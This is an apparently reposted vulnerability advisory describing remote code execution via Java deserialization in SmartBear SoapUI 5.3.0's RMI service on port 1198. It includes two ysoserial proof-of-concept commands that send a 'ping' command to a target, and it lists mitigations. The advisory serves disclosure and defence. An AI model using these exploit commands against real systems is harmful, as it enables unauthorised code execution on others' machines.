SmartBear SoapUI 5.3.0 Remote Code Execution Via Deserialization

2017.10.08
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Title: SmartBear SoapUI - Remote Code Execution via Deserialization Author: Jakub Palaczynski Date: 12. July 2017 Exploit tested on: ================== SoapUI 5.3.0 Also works on older versions. Vulnerability: ************** Remote Code Execution via Deserialization: ================================= SoapUI by default listens on all interfaces on TCP port 1198 where you can find SoapUI Integration (RMI) instance. SoapUI uses vulnerable Java libraries (commons-collections-3.2.1.jar and groovy-all-2.1.7.jar) which can be used to remotly execute commands with permissions of user that started SoapUI. Entry point: Java RMI Registry on TCP port 1198 Vulnerable libraries used - commons-collections-3.2.1.jar and groovy-all-2.1.7.jar Proof of Concept: Sample PoC using Commons Collections vulnerable library: java -cp ysoserial-0.0.5-SNAPSHOT.jar ysoserial.exploit.RMIRegistryExploit SOAPUI_IP 1198 CommonsCollections1 'ping OUR_IP' Sample PoC using Groovy vulnerable library: java -cp ysoserial-0.0.5-SNAPSHOT.jar ysoserial.exploit.RMIRegistryExploit SOAPUI_IP 1198 Groovy1 'ping OUR_IP' Mitigations: - bind SoapUI Integration instance to localhost if possible - update all Java libraries that are known to be vulnerable: commons-collections-3.2.1.jar groovy-all-2.1.7.jar Contact: ======== Jakub[dot]Palaczynski[at]gmail[dot]com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top